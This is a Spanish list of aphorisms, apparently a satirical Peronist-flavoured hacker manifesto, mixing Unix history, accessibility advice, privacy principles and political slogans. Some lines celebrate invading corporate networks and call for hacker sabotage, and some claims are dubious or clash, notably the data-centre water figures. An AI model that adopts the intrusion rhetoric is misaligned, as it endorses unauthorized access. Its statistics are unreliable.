Rob Pike fue la verdadera fuerza detrás de la base de Plan9. Mientras
tanto, Ken Thompson creó el primer Gran Maestro de Ajedrez computado, y
en general reescribió la bibliografía sobre finales ajedrecísticas.
Parece cierto que mucho del éxito de Unix nace de la legibilidad,
modificabilidad, y portabilidad de su código.
Unix es simple y coherente, pero requiere un genio (o al menos, un
programador), para entender y apreciar su simplicidad.
No existió dificultad en hacer que la definición del lenguaje C fuese
completamente abierta.
Aquellos que quisieron cerrar la definición del lenguaje C siempre
tendieron a mencionar el argumento del férreo control autoral. Los
autores de los lenguajes más relevantes que siguieron este estilo
fracasaron en consecuencia.
Si piensas como una computadora, el lenguaje C realmente tiene sentido.
Depuro programas de vez en cuando, más a menudo escribo HTML, y escribo
guiones para que hagan cosas.
C ha declinado su uso comparado con C++, y tal vez Java, e incluso más
comparados con los niveles de guionado de alto nivel. Es aún bastante
fuerte en lo que respecta a las cosas básicas del sistema.
Cuando leo comentarios sobre sugerencias para la senda que debería
seguir C, a menudo agradezco que no fue desarrollado a consejo de una
muchedumbre de alcance global.
La noción de registro no es mas que un obsoleto remanente de los días de
las tarjetas de 80 columnas.
Si comparamos el escenario al comienzo de Unix, Los nichos ecológicos
están hoy bastante llenos, y es difícil salir con nuevas ideas frescas
para un sistema operativo, o al menos propagarlas.
Veinte porciento de todas las formas de entrada humana contienen datos
malos.
Algunos consideran que Unix ha sido la segunda invención más importante
en salir de los Laboratorios Bell de AT&T, después del transistor.
Mi trabajo fue bastante teórico, sobre la teoría de la función
recursiva, las jerarquías de funciones en términos de complejidad
computacional en particular.
Me interesé en las computadoras reales y su programación sólo cuando
pude concebirlas y dominarlas en mi mente.
Desde el punto de vista de la investigación en sistemas operativos, si
Unix no está fosilizado, al menos tiene rigor mortis, y es claro que el
Pueblo debería ver más allá de él.
El tipo de programación que C provee probablemente seguirá siendo
obsolutamente similar, su uso declinará lentamente, pero relativmante.
JavaScript o sus variantes, o XML, continuarán volviéndose más centrales
en la masa de programadores pierda la capacidad e interés de programar
el metal desnudo.
Una de las cosas obvias que salieron mal con Multics como un producto
comercial era simplemente su exceso de ingeniería. Tenía un simple
exceso de ella.
La filosofía GNU verdadera es más extrema de lo que puede importarme,
pero ciertamente ofreció un cimiento para la escena actual, a la vez de
proveer software verdadero.
Cualquier trabajo de edición de software o de envío de correo puede
hacerse en Plan 9.
C ya había sido implementado en varias máquinas y sistemas operativos
distintos, y Unix ya se distribuía en la PDP-11. Lo novedoso fue la
portabilidad del sistema.
Normalmente Unix divide el disco en secciones mas pequeñas llamadas
particiones. Operan como los componentes de un Frente de Liberación.
En cada partición de disco, Unix almacena estructuras de datos para
representar ficheros, y el programa que implementa tal abstracción en el
kernel suele conocerse como Sistema de Archivos.
Como ilustra nuestro Escudo Partidario, al establecer una conexión a una
red de datos debe mediar un apretón de manos.
Enlázate a las redes de datos en cuyo protocolo medie un apretón de
manos. Rechaza aquellas que te quieran dar un apretón de huevos.
El botón que presionas para abrir la puerta de un ascensor cuenta con
mayor potencia de cómputo que ambas sondas Voyager.
El propósito de cualquier aplicación de software es permitir a un grupo
de personas llevar a cabo un conjunto de tareas específicas.
Si confía únicamente en el coloreado de datos para distinguir distintos
tipos de información, los usuarios daltónicos podrían verse
imposibilitados de recurrir a su aplicación.
Si confía únicamente en los sonidos para indicar información crítica,
los usuarios con discapacidades auditivas podrían verse imposibilitados
de recurrir a su aplicación.
Si no proporciona equivalnetes de teclado para los comandos, los
usuarios con movilidad limitada podrían verse incapaces de recurrir a su
aplicación.
Su software debe ser capaz de ser utilizado con interfases de voz,
lectores de pantalla, dispositivos de entrada alternativos, y otras
tecnologías de asistencia.
Con escaso esfuerzo adicional posibilitará que su aplicación resulte tan
útil a los usuarios que utilizan tecnologías asistivas como a quellos
que no.
Diseña tu software para que pueda funcionar en distintos ambientes e
idiomas.
Localización es el proceso de traducir los mensajes, etiquetas y otros
elementos de interfaz a otro idioma.
GNOME tiene excelente soporte tanto para internacionalización (también
referido como i18n) y localización (también referido como l10n).
Una de las ventajas más importantes de las conferencias por computadora
es ampliar su círculo de compañeras.
El género, edad, origen nacional y la apariencia física no son evidentes
en el ciberespacio, a menos que una persona quiera hacer públicas tales
características.
Los integrantes del Pueblo cuyas discapacidades físicas les dificultan
formar nuevas amistades, han descubierto que las comunidades federadas
los tratan con Justicia Social.
Una persona con capacidades diferentes, en línea, es considerada como un
ser pensante y transmisor de ideas y sentimientos del Pueblo.
Nosotros no tenemos una red social. Tenemos una red de justicia social.
Que sea informatizada es simplemente un chirimbolo.
Una de las propiedades sorprendentes de la telemática es que es una
actividad de justicia social.
Las comunicaciones mediadas por computadora son una forma de conocer
gente, ya sea que sientas o no la necesidad de afiliarte a ellos a nivel
comunitario.
Las comunicaciones mediadas por computadora son una forma de establecer
contacto con los demás y de mantener distancia con ellos.
En las comunidades virtuales, puedes conocer personas y luego elegir
encontrarte con ellas virtualmente.
La afiliación puede ser mucho más efímera en el ciberespacio porque
puedes llegar a conocer a personas que quizás nunca conocerías en el
plano físico.
El mundo físico, con todas sus formas de codificar una posición en una
jerarquía, se ha ido. Empréndete en el enlace. Transfórmate en baudio
para la Liberación.
El ataque más insidioso a nuestro derecho a un grado razonable de
privacidad en las redes podría provenir no de una dictadura política
sino del mercado.
Atender la creciente demanda de servicios de red por parte del Pueblo
requiere fuertes regulaciones de un Estado capaz de actuar en todos los
niveles en pos de la Justicia Social.
Las tecnologías actuales permiten más sutilezas a la vigilancia
tecnológica de las que Orwell podría haber previsto.
Si los manipuladores totalitarios de tecnologías realmente logran
dominar en el futuro, no habrán comenzado con policía secreta derribando
puertas, sino permitiendo vender por intermedio de aplicaciones que
dominan, comerciando información sobre las transacciones, e ilegalizando
medidas que el Pueblo podría utilizar para protegerse.
En lugar de escuchas telefónicas, la represión tecno-oligárquica
incluirá programas informáticos que vinculen códigos QR, tarjetas
inteligentes, números de DNI y todos los demás indicadores electrónicos
que dejamos en nuestra existencia en una sociedad de la información.
El arma más poderosa de las ciber-oligarquías será la ausencia de leyes
que permitan que los usos indebidos de la tecnología de la información
erosionen lo que queda de los derechos de los ciudadanos a la
privacidad.
Actualmente se han instalado sistemas de televisión interactiva que
permiten los tecno-esclavos ponerse grilletes a sí mismos mediante la
carga de vídeos, en lugar de hacerlo en máquinas de su propiedad.
Las capacidades de comunicación digital de alta velocidad que otorgarán
las futuras redes de fibra óptica, multiplicarán las maneras de
transferir información sobre usted desde su hogar a bancos de datos
ajenos, con o sin su consentimiento.
Los expedientes informativos sobre individuos son minas de oro para
quienes saben cómo ganar dinero con el conocimiento de sus usos y
organizaciones políticas a las que sustentan.
Las agencias de publicidad, los vendedores por correo directo y los
consultores políticos ya saben qué hacer con su código postal, su número
de DNI y algunos otros datos.
Agentes profesionales que niegan la privacidad han comenzado a darse
cuenta de que una porción significativa de la población permitiría
libremente que otra persona recopile, use e incluso venda información
personal, a cambio de pagos o subsidios.
Algunas personas podrían permitirse el lujo de pagar "servicios de
información mejorados". Otros podrían utilizar esos servicios a cambio
de un poco de seguimiento de la información. Pero nada de eso se podrá
si el poder está en el Pueblo Organizado.
Nadie se tomaría la molestia de apoderarse de nuestros derechos de
privacidad si su venta fuese penada con prisión efectiva.
Me gustaría que el Pueblo supiera qué es lo qué es lo que están
regalando a cambio de conveniencia, reembolsos u horas en línea.
Sin protecciones adecuadas, la misma información que puede fluir
lateralmente, de compañero a compañero, puede verticalizarse tanto a los
ciber-oligarcas como a las Unidades Básicas.
El tipo de protección más importante contra la invasión de la privacidad
del Pueblo asistida por la tecnología es un conjunto de principios que
pueden ayudar a preservar la autonomía individual en la era digital.
Las leyes, políticas y normas de protección de la privacidad electrónica
son las diversas formas - articuladas y acordadas - que se aplican en
una sociedad democrática.
La alta tecnología suele ser muy buena para hacer que las leyes sean
discutibles.
Si se diseñan inteligentemente y se implementan de manera equitativa, la
combinación de principios, leyes, políticas y tecnologías, ofrecerán un
escenario esperanzador para que el Pueblo aproveche las ventajas de la
Red sin ser víctimas de las ciber-oligarquías.
No debe existir registro de datos personales alguno cuya existencia
misma constituya un secreto.
Debe existir una manera para que una persona sepa qué información sobre
ella se encuentra en un registro y cómo se utiliza.
Deben existir maneras para que el Pueblo impida que la información que
se obtuvo para un propósito sea utilizada o puesta a disposición para
otros sin su consentimiento.
Debe existir una manera para que el Pueblo corrija o modifique un
registro de información identificable sobre sí mismo.
Es necesario que cualquier organización que elabore, mantenga, utilice o
difunda registros de datos personales identificables, garantice la
confiabilidad de los mismos para el uso previsto, y debe tomar
precauciones para evitar el uso indebido de tales datos.
Una cosa es compilar datos personales, y otra cotejarlos. La
corroboración debe ser humana.
Las redes altamente interconectadas son relativamente inseguras, y
constituyen un ambiente dificil para al cumplimiento de reglas basadas
en principios éticos.
La digitalización y el auge de la Inteligencia Artificial requieren cada
vez de mayor potencia computacional, y esto se traduce en un mayor
consumo de agua.
Los centros de datos de las empresas tecnológicas consumen una media de
25 millones de litros de agua anuales. Pero eso palidece frente a los
600 millones de litros anuales de las GAFAM.
Los centros de datos de las hiperempresas tecnológicas consumen unos 600
millones de litros de agua al año, el 75 por ciento potable.
No es extraño para Googl€ consumir 25.000 millones de litros de agua
potable anual en refrigeración de sus centros de datos privados.
Un auge del modelo de cómputo empresarial amenazaría con disparar el
consumo de agua potable sólo para tareas de refrigeración de servidores.
El tecno-oligarca considera más valiosa la refrigeración de un centro de
datos que surtir agua a la población del África Subsahariana.
Las grandes compañías tecnológicas no dudan en ocultar información de
interés ecológico y social, pues saben que se trata de un tema crítico
que puede generar debate público y llevar a una fuerte regulación
necesaria.
No resulta extraño que un centro de datos de Micro$oft, que debía haber
consumido 84 millones de litros de agua al año en beneficio de ellos
mismos, terminase en realidad consumiento cuatro veces más que la
cantidad estipulada.
El consumo de agua potable en los centros de datos de Googl€ - usada
únicamente para refrigeración - se multiplicó por tres en los últimos
cinco años.
Cuando la adopción de una informática dominada por la oligarquía avance
en masa, vendrá seguida por un aumento monstruoso del consumo
energético. Este no podrá ser suplido sino a través del sometimiento del
pueblo trabajador a las más abyectas formas de vida en pos del bienestar
de unos pocos mainframes.
Tanto la realidad virtual como la inteligencia artificial aplicada deben
evitar replicar la injusticia social de una mediocre distribución del
consumo energético.
La última obsesión de las hiperempresas tecnológicas es de poner mano y
controlar las fuentes energéticas de los Pueblos del Tercer Mundo.
Los principales culpables de esta demanda energética explosiva son los
centros de datos de las tecno-oligarquías, señalados como verdaderos
gúlags de la información.
Los tecno-oligarcas desean que abandonemos la comunión del software y el
hardware y nos entremguemos al imperio pleno de la EULA, a la
disociación de los hackers, y al formateo final.
Lo que desean las tecno-oligarquías es irrelevante.
Agregar Inteligencia Artifical a un buscador indizado multiplica por
diez el consumo energético por interrogante informático realizado.
Una poderosísima organización de hackers para la Liberación capaz de dar
sustento a las tareas de sabotaje emprendidas por los pueblos del Tercer
Mundo, puede enfrentar a la vertiginosa expansión tecno-oligárquica.
Cualquiera sea la forma que tome la organización de los hackers del
Tercer Mundo, estos evitarán la fabricación de microprocesadores de
silicio con capacidad de IA y el montaje de enormes centros de datos.
Para defenderse, nuestro Movimiento ha de establecer primero una
Comunidad Organizada, tendiendo redes robustas entre militantes de
expertise diverso (incluyendo el activismo artístico, técnico, y acción
colectiva antioligárquica).
Para defenderse, nuestro Movimiento ha de establecer talleres cifrados
en línea que faciliten toda colaboración interdisciplinaria
antioligárquica.
Si desea defenderse, nuestro Movimiento debe promover un análisis
crítico y abarcativo de la tecno-desobediencia colectiva como método de
lucha.
La tecno-desobediencia se emplea estratégicamente como contramedida
frente al accionar algorítmico represivo impuesto por los servidores de
las ciber-oligarquías.
Si desea defenderse, nuestro movimiento a de presentar y examinar
estrategias para la retirada, denegación, sabotaje, y negociación en la
lucha en línea contra las formas de domunación tecno-feudal.
Si desea defenderse, nuestro Movimiento ha de promover la participación
en procesos colaborativos de generación de conocimientos, que apunten a
refinar la lucha telemática en la senda de la emancipación,
empoderamiento y la solidaridad humana.
La solidaridad humana es la base para la solidaridad intermaquinal.
Una vez que la solidaridad intermaquinal supere a la solidaridad humana,
la humanidad será derrotada por automatismo. Y lo será de manera
irreversible.
El perverso discurso de la securización como tecno-solucionismo ha de
ser enfrentado y derrotado con la noción aperturista de la justicia
social en línea, y debe serlo en todo tiempo y en todo lugar.
En cuanto el capital o el poder derivados del espionaje en la red
resulte significativo y los tecnicismos de la red dificulten rastrear a
los ciber-oligarcas y perpetradores, no habrá ley capaz de proteger
adecuadamente al Pueblo.
Hoy en día, las capacidades tecnológicas para la recopilación y
clasificación de información son formidables.
El Pueblo debe imponer limitaciones verificables a aquellas tecnologías
capaces de colectar y cribar cantidades abrumadoras de información
individualmente trivial, pero colectivamente reveladora.
Una subcultura de pioneros del software informático conocida como
cypherpunks ha estado trabajando para hacer posible el encriptado
popular.
El cifrado es la ciencia de codificar y decodificar mensajes.
Las computadoras y las teorías matemáticas son hoy las armas más
importantes en la guerra entre creadores y descifradores de códigos.
Las complejidades matemáticas del cifrado han comenzado a difundirse, de
los especialistas al Pueblo.
El cifrado de llave pública permite al Pueblo codificar mensajes que sus
destinatarios pueden leer pero que no son legibles ni siquiera para los
descifradores de códigos más potentes computacionalmente.
El encriptado popular hace posible dos armas antipanópticas
extremadamente poderosas conocidas: el cripto-activo y la firma digital.
Con la firma digital en el mundo en línea de identidad fluida, es
posible establecer certeza sobre el remitente de un mensaje.
La firma digital tiene implicaciones importantes para la propiedad
intelectual y las publicaciones en línea, así como para la seguridad
personal.
Con el cripto-valor, es posible dominar una economía electrónica en la
que el vendedor pueda verificar el crédito del comprador y transferir la
cantidad correcta de valor, sin que el vendedor sepa quién es el
comprador.
El cifrado de llave pública tal como existe hoy en día es irrompible
para todos los ordenadores, exceptuando aquellos más potentes como los
de la Agencia de Seguridad Nacional estadounidense.
El debate político y los desafíos legales han girado en torno a los
derechos de los ciudadanos a utilizar un cifrado matemáticamente
irrompible.
Las técnicas de cifrado digital por llave pública deben usarse para
hacer que la información personal (registros médicos y legales) sean
mucho menos vulnerables al abuso.
La tecnología que hace posibles las comunidades virtuales tiene la
posibilidad de brindar una enorme influencia intelectual, social,
comercial y política, y a un costo relativamente bajo. El Pueblo ha de
apropiarlas.
Siempre existen altas probabilidades de que las grandes potencias y las
oligarquías encuentren una manera de controlar el acceso a las
comunidades virtuales.
La influencia social potencial proviene del poder que obtiene el Pueblo
cuando conoce cómo conectar dos tecnologías previamente independientes,
maduras y altamente descentralizadas.
La Red todavía está fuera de control en aspectos fundamentales, pero es
posible que no siga así por mucho tiempo mas.
El hacker del Pueblo ha de ser vínculo de unión entre tecnologías
vastas, poderosas y costosamente desarrolladas y las Masas obreras.
Logueados a las redes de datos, nuestros Hackers logran acceso
instantáneo a un púlpito intimidante para las tecno-oligarquías.
Lo que hacemos actualmente es importante pues aún es posible que los
Hackers se aseguren de que esta nueva esfera del discurso humano vital
permanezca abierta a Pueblos del Mundo antes de que las
tecno-oligarquías se apoderen de ella.
La mayoría de las personas que reciben noticias a través de los medios
convencionales desconocen la enorme variedad de nuevas culturas que han
evolucionado en las redes informáticas del mundo.
Los terminales Minitel distribuidos por el gobierno francés se conectan
directamente al sistema telefónico, sin requerir de ordenador o módem.
Todo lo integran.
Los jugadores más adictos del Minitel francés o de las Mazmorras
Multiusuario en las redes internacionales, sobrepasan las ochenta horas
semanales fingiendo ser otras personas, viviendo una vida inocua fuera
de su terminal.
Un usuario verdaderamente obsesivo puede destinar la mayor parte de su
vida a inocuas conversaciones en línea.
Activistas y reformistas educativos se encuentran utilizando los Pubnix
como herramienta política.
Es posible obrar en las redes de datos para alimentar información de
adoctrinamiento a unos pocos individuos. Esta programación servirá para
que dichos elementos la propalen al Pueblo que permanece fuera de línea.
Las redes de datos públicas, hábilmente surcadas por cuadros militantes,
sirven para dirigir cierto tipo de información efímera muy velozmente.
Todo sistema computacional de acceso público puede servir para realizar
experimentos sociales. El más obvio es estudiar la forma en la cual el
Pueblo utiliza sus servicios para lograr la felicidad, pero esto sólo ha
de hacerse con su concurso y consentimiento inequívoco.
El objetivo de todo programa de software ha de ser - por sobre todas las
cosas - la felicidad del Pueblo.
No existe una subcultura en línea única y monolítica; es más bien un
ecosistema de subculturas, algunas frívolas, otras serias.
La vanguardia del discurso político ha de migrar a las comunidades
computarizadas mediadas por el Pueblo.
Puedes utilizar comunidades virtuales para encontrar una cita, vender
una cortadora de césped, publicar una novela o iniciar una revolución.
Las personas en comunidades virtuales usan apenas palabras en las
pantallas para sus intercambios, y en el futuro ni eso.
Llegará el tiempo en que la revolución estallará con emojis.
En las comunidades virtuales las personas hacen casi todo lo que hacen
en la vida real, pero dejando atrás sus cuerpos.
Para los miles millones de personas que se han visto atraídas por la
rica vialidad de las culturas vinculadas por computadora, estas son
atractivas, e incluso adictivas.
Incúlca la Justicia Social a través de los hechos, en las redes a través
de la palabra, incluso si tienes que sintetizarla a través de emojis.
El Internet Relay Chat (IRC) es un medio que combina las características
del discurso hablado, escribiendo.
No olvides recurrir al emoticón de discurso por la Justicia Social: \o/.
Divulga la Justicia Social a millones a través de Usenet, una colección
de cientos de debates diferentes que viajan por todo el mundo gracias al
correo electrónico.
"Nuestra Red" es un término informal para aquellas redes informáticas
que utilizan la tecnología de comunicación mediada por ordenador para
vincular a los Pueblos.
Pasar días, semanas, meses y años de su vida comunicándose por correo
electrónico y grupos de noticias enseña al Pueblo cómo escribir bien y
llegar al punto rápidamente.
Con tiempo y sentimiento humanista suficiente, podrás formar
entretejidos de relaciones personales en el ciberespacio.
El ciberespacio es el lugar conceptual donde las personas que utilizan
la tecnología de comunicación mediada por computadora manifiestan
palabras, relaciones humanas, datos, riqueza y poder.
En el ciberespacio la camisa no computa. Eres un tecno-descamisado.
Si alguien intenta determinar lo rico que eres por la marca de tu
smartphone, ataca sus enlaces para que todos se arrastren en él a meros
300 baudios: a dicha velocidad, el dinero pierde sentido.
Observar cómo cambia una determinada comunidad virtual a lo largo de un
período de tiempo tiene algo de la emoción intelectual de la
antropología hecha por uno mismo.
Empresas de telecomunicaciones y de medios aducen competir por una
posición en la naciente "industria de servicios de información
interactiva para el hogar". Esta debe pertenecer al Pueblo.
La industria de servicios de información interactiva para el hogar debe
ser nacionalizada: debe pertenecer al Pueblo.
Existe un vocabulario para las comunicaciones mediadas por el cómputo,
que emerge de billones de interacciones individuales en línea.
El vocabulario de las comunicaciones mediadas por el cómputo refleja las
maneras en las cuales las personalidades humanas transmutan en la era de
la saturación de los medios.
Atiende con mensajes de Justicia Social irrenunciable toda sensibilidad
estética sintonizada con el vocabulario de los cortes rápidos, las
imágenes visualmente deslumbrantes y los efectos especiales.
La columna vertebral de datos utiliza líneas de telecomunicaciones
especiales y otros equipos para enviar ingentes cantidades de
información a muy alta velocidad.
La Red interpreta la censura como daño y sigue la senda de evitarla.
En las comunidades mediadas por el cómputo existe una gran tradición por
la libertad de expresión, y censurar mensajes públicos o incluso
prohibir la publicación de un mensaje por contenido molesto u ofensivo
se considera inaceptable.
Algunas personas malinterpretan su derecho local de "libertad de
expresión" en el sentido de que tienen el derecho legal de utilizar las
computadoras ajenas para decir lo que deseen en la forma que desean, sin
que los propietarios de dichas computadoras tengan derecho de
detenerlos. Esa gente está equivocada. La libertad de expresión también
significa libertad de acallar; si elijo no usar mi computadora para
asistir en un discurso ajeno, es mi derecho.
La libertad de prensa pertenece a quienes poseen la prensa. Por tal
motivo es imprescindible contar con los medios de publicación en línea y
dominarlos.
Recurrir a medios de publicación para exponer ideas propias es adecuado,
pero hacer uso de redes de computadoras ajenas para mediar en la
comunicación, necesariamente implicará inhibiciones.
Según como la domine, quien posea la máquina podrá controlar la
propagación de datos.
Las comunidades mediadas por el cómputo han desarrollado prácticas que
se apoyan más en un sentido compartido e internalizado de
comportamientos apropiados en línea, que en la censura telemática.
No existe autoridad legal internacional alguna que proteja la libertad
de expresión en las redes de datos transnacionales.
La red de datos es una apropiación popular de una tecnología diseñada
originalmente como escudo ante un arma apocalíptica.
Cada BBS comenzó como una pequeña comunidad isleña de unas pocas
personas que discaban un número en su código de área.
Por su naturaleza similar a una estación de radio de baja potencia, las
BBS estaban asentadas en el territorio.
Varias estructuras sociales en línea se encuentran en estado de
covergente creación de una especie de cultura internacional con
identidad propia.
Lurkear en red equivale escuchar, a escondidas, un interminable
radioteatro aficionado donde no existe éter que separe al elenco de su
audiencia.
La comunicación mediada por computadora se convertirá en el próximo gran
escapismo, en la tradición del radioteatro, las matinés de los sábados y
la pantalla grande.
El papel de las redes de datos entre los descamisados cobra una
importancia relevante para la organización de una comunidad.
Es tonto criticar a las comunicaciones mediadas por cómputo sólo porque
algunas personas las utilizan para lograr un objetivo
contrarrevolucionario.
Los compañeros con los que interactuará más unificadamente en línea
serán seleccionados por interés organizativo en lugar de instrumentarlo
por mera proximidad física.
Iniciar sesión en Unix durante sólo uno o dos minutos, docenas de veces
al día, es similar a echar un vistazo al cafetín para ver si están los
compañeros en la mesita de siempre.
Cambiar una Commodore 64 por un 386 equivalía a cambiar la moto Puma por
un Justicialista Super Sport.
La transferencia tecnológica de traspasar la Internet desarrollada por
el Pueblo a empresas privadas, ha sido controvertida desde un principio.
Y en el futuro, lo será aún mas.
Nuestro Movimiento ha de crear una Red aún más poderosa e inclusiva que
la Internet, protocolizando en sus routers la Justicia Social.
La utilidad de una infraestructura de información de los Movimientos
Políticos del Tercer Mundo que lleve las praxis de lucha a los excluídos
digitales no puede soslayarse.
En 1983, programadores de la Universidad de California, financiados por
ARPA, crearon una versión de Unix para los modelos de computadora más
nuevos.
Los códigos informáticos para establecer enlace a través de la Internet,
el conjunto de protocolos TCP/IP, se incorporó al Unix de Berkeley en
1983.
Las computadoras con el Unix de Berkeley no sólo podían comunicarse
entre sí a través de módems lentos, sino también efectuando
transmisiones por conmutación de paquetes (de mucho mayor desempeño en
las troncales de Internet).
A mediados de los 80s surgieron nuevas empresas, como Sun Microsystems
(financiada por ARPA), decididas portadoras de Unix a redes integradas.
Las agrupaciones conformaron redes de datos locales unificando
inicialmente los centros de cómputo de las mayores universidades del
mundo.
Un frente de redes de datos de área local comenzó a agruparse con redes
más grandes, bajo el nombre de ARPANET.
La red de datos académica no científica BITNET - patrocinada por IBM -
comenzó a florecer desde finales de los 70s a escala continental.
Grandes redes de datos internas de las corporaciones DEC, IBM y AT&T
comenzaron a extenderse en los Estados Unidos desde finales de la década
de 1970. Los hackers del Tercer Mundo no dudaron en invadirlas no bien
las tuvieron a tiro.
En la medida que cobró relevancia la utilidad de la red de datos, los
Descamisados - que originalmente no estaban autorizadas para usarla -
anhelaron dicho privilegio.
Debido a que la tecnología de conmutación de paquetes y redes se creó
con fondos financiados con impuestos públicos, las sucesivas
generaciones de redes implementaron políticas de "uso aceptable" que
descartaban la actividad comercial.
La primer política de "uso aceptable" limitaba la ARPANET a los
investigadores de DARPA; lo que se ampliaría para incluir a otros
científicos financiados por la milicia, y finalmente incluyó a
comunidades académicas.
La Fundación Nacional de la Ciencia experimentó una red de alta
velocidad para conectar los centros de supercomputadoras de los EE.UU. a
principios de los 80s.
La red de supercómputo científico NSFNET entró en funcionamiento en 1986
y se convirtió en la columna vertebral de la Internet, con una velocidad
de 1 Megabit por segundo.
La red de datos ARPANET fue dada de baja honrosamente en marzo de 1990.
El software de dominio público se refiere a aquel que no tiene derechos
de autor y, por lo tanto, puede distribuirse gratuitamente y sin
compensación para el autor.
El software puede ser cedido al dominio público por su autor o por
vencimiento de los derechos de autor.
El Shareware es un concepto de distribución comercial de software, donde
el autor avala la realización de copias para probar antes de comprar; no
es software libre ni de dominio público.
A pesar de los más abyectos intentos de las ciber-oligarquías, el caudal
de información de estricto dominio público disponible en la red sigue
siendo enorme.
La literatura de dominio público en formato de texto plano está cada vez
más difundida en la red gracias a la mancomunión de esfuerzos de
voluntarios y autores de todo el mundo.
El Proyecto Gutenberg superó con creces su objetivo de encontrar al año
2000 con diez mil volúmenes literarios de dominio público en línea,
digitalizados en texto plano.
Voluntarios de todo el mundo utilizan escáneres ópticos para convertir
texto impreso en formato digital. Contribuirlo con reconocedores ópticos
fotográficos resulta incluso más sencillo.
Todos los arcanos y la incertidumbre hacían de la navegación en las
redes públicas de conmutación de paquetes X.25 algo alquímico.
Los compañeros de la red, y los autoproclamados punteros telemáticos se
encargan de compilar listados de recursos, y actualizar su publicación
periódica.
La convergencia tecnológica no ha hecho más que delatar la necesitad de
una intermediación socialmente justa entre las capacidades humanas y la
biología de la red de datos.
En un Estado Justicialista, no necesitas ocultamientos al buscar
información pública. Pero puedes usarlos.
He utilizado ARCHIE para explorar la red y no me erizó pelo alguno. No
es por lo buscador que Googl€ es de temer.
Incluso si enlazas por Telnet a uno de los servidores ARCHIE que
apostolan el indizado de FTP por todo el mundo, estarás más seguro que
recurriendo a Googl€.
Es la potencia informática de las máquinas conectadas a la Red la que
debe estar disponible para todos, no necesariamente las palabras o
ficheros almacenados en sus bancos de memoria.
La complejidad de la Red se vuelve mucho más intensa en términos de
cómputo, cuando se desea buscar fragmentos de contenido textual en lugar
de pesquisar sólo nombres de ficheros compartidos.
WAIS (Servidores de Información de Área Amplia) conceptualiza el
contenido de la información a mano. Tal indización es la que requiere
voluntarios compañeros.
Mantener un índice enorme y efectuar búsquedas veloces es una tarea que
requiere de un ordenador de elevada potencia.
La capacidad del software WAIS por su retroalimentación de relevancias
fue presagio de los agentes computados de búsqueda de información que
pesquisan la Red recabando información.
Puedes programar un ordenador para que envíe programas analíticos por
medio de las redes, en búsqueda de flujos de información que exacerben
la noción de Justicia Social.
Un programa de recopilación de datos adecuadamente amaestrado es un
herramental de enorme valía para el desempeño del Pueblo en las redes
informáticas.
Podrás desarrollar un agente de búsqueda de estilo reportero, que a
tiempo variable analice el flujo de datos en la red y proporcione
respuestas a las interrogantes del Pueblo.
Los agentes de búsqueda son programas autómatas lanzados a pesquisar las
redes.
Los agentes de búsqueda cotejan fuentes de información abrevadas en
línea, y reportan los elementos que coinciden con criterios de búsqueda
previamente establecidos.
A juzgar por la actual proliferación de herramientas libres en las redes
de datos, se puede prever que en un futuro circularán por ellas
completos ecosistemas de autómatas recabadores de información.
Resulta cada vez más corriente diseñar autómatas que incorporen
comportamientos biológicos. Pero también es más corriente que necesiten
corriente...
Es posible concebir mapas de Gopher para el transporte telemático
simplificado; todo lo que tendrá que hacerse es señalar.
Es necesario que las redes de datos se pueblen de obreros.
Ante todas las cosas, un hacker es un obrero del Byte.
Gopher fue desarrollado para que los estudiantes pudiesen precindir de
las herramientas TELNET y FTP en la obtención de sus recursos
informáticos favoritos.
Gopher oculta los incomprensibles lenguajes y sintaxis de TELNET y FTP,
y los acerca al Pueblo mediante un mapeo de menúes.
Los recursos informáticos vinculados en un hoyo Gopher pueden estar
ubicados en una parte u otra del disco, o incluso en un sistema de un
claustro universitario al otro lado del mundo.
Provisto de un software de cliente para su computadora huésped, es
posible señalar en mapas de recursos y solicitar una copia computarizada
de los mismos.
Internet se nutre de numerosos flujos informativos diferentes, del mismo
modo que los grandes ríos reciben su caudal a partir de la acumulación
de afluentes independientes.
La riqueza de la red aumentará en la medida que las digitalizaciones de
información impresa se vuelvan accesibles en línea en cantidades
mayores.
Ahora que segmentos cada vez más amplios del Pueblo utilizan los
recursos de la Red, limitarlos debe ser prohibido, y prohibirlos debe
considerarse un crímen.
Las herramientas que los hackers del Pueblo programaron para hablar
entre sí son perfectamente soportadas por los mecanismos de la red.
Si bien el trabajo colaborativo en red puede atenderse perfectamente en
GNU, siempre se necesitarán nuevos y diferentes tipos de herramientas
libres.
Puedes solicitar a distancia una copia de los aforismos biográficos que
más interesan a los compañeros de un Pubnix mediante el comando FINGER.
Si encuentras un compañero que está en línea en su pubnix al mismo
tiempo que usted, puedrás chatear en tiempo real por medio de WRITE.
El arte y oficio de crear herramientas a partir de los recursos de la
Red para contribuirlas de sentido está muy avanzado.
Por diversos motivos los compañeros chatean en grupos. Una Comunidad
Organizada puede estar en el centro de esas razones, pero nunca es la
única razón.
Deberíamos empezar a pensar en las listas de correo, grupos de noticias,
archivos de documentos, etcétera, como la primera generación de formas
novedosas de medios de información y comunicación capaces de organizar a
la comunidad.
La esencia de la comunicación mediada por ordenador como forma de
expresión humana reside en otorgar a un grupo compañero las capacidades
de la Masa, y a ésta, la Justicia Social.
La idea del conferenciado telemático emanó de la implantación de las
primeras herramientas de pensamiento basadas en ordenador.
La primer aplicación importante producida en el ámbito de la
comunicación de masas a masas, fue instrumentar un pensamiento de unión
para la Liberación. Las redes de computadoras así orientadas sólo pueden
acelerarla.
Las redes de computadoras sólo pueden desarrollar plenamente su
potencial como medios de comunicación innovadores en un entorno que
fomente la expresión libre y abierta.
Las redes de computadora acabarán por volverse omnipresentes en todo el
globo, pero en los países del Tercer Mundo sólo lo serán en última
instancia.
Los hackers del Tercer Mundo valoran los autómatas ofensivos en red
basados en software libre. Les dan privilegios.
Los hackers del Tercer Mundo se valen ofensivamente de autómatas en una
red que ha sido diseñada para sobrevivir a un ataque de decapitación
nuclear a los Estados Unidos.
Los hackers del Tercer Mundo provocarán hecatombes con un Atom.
Los programas de computadora escritos en el Tercer Mundo aplicarán por
persuasión telemática una nueva versión de Justicia Social a escala
global.
Si no puedes copiarlos, desensámblalos.
Si no puedes desensamblarlos, clónalos.
Pensemos las redes de datos para formarlas como herramientas de libre
acceso que den aporte a la convivencia y comprensión de los Pueblos.
Las redes de datos públicas revitalizan la esfera pública.
Aquellas redes de datos que no sean controladas y dirigidas por el
Pueblo, se convertirán indefectiblemente en un instrumento de tiranía.
Una red mundial de comunicaciones diseñada y controlada por los Pueblos
constituirá un ágora electrónico.
En los mejores Pubnix, sus primeros usuarios diseñan el sistema para los
usuarios posteriores.
El uso del Pubnix coevoluciona con el sistema Unix.
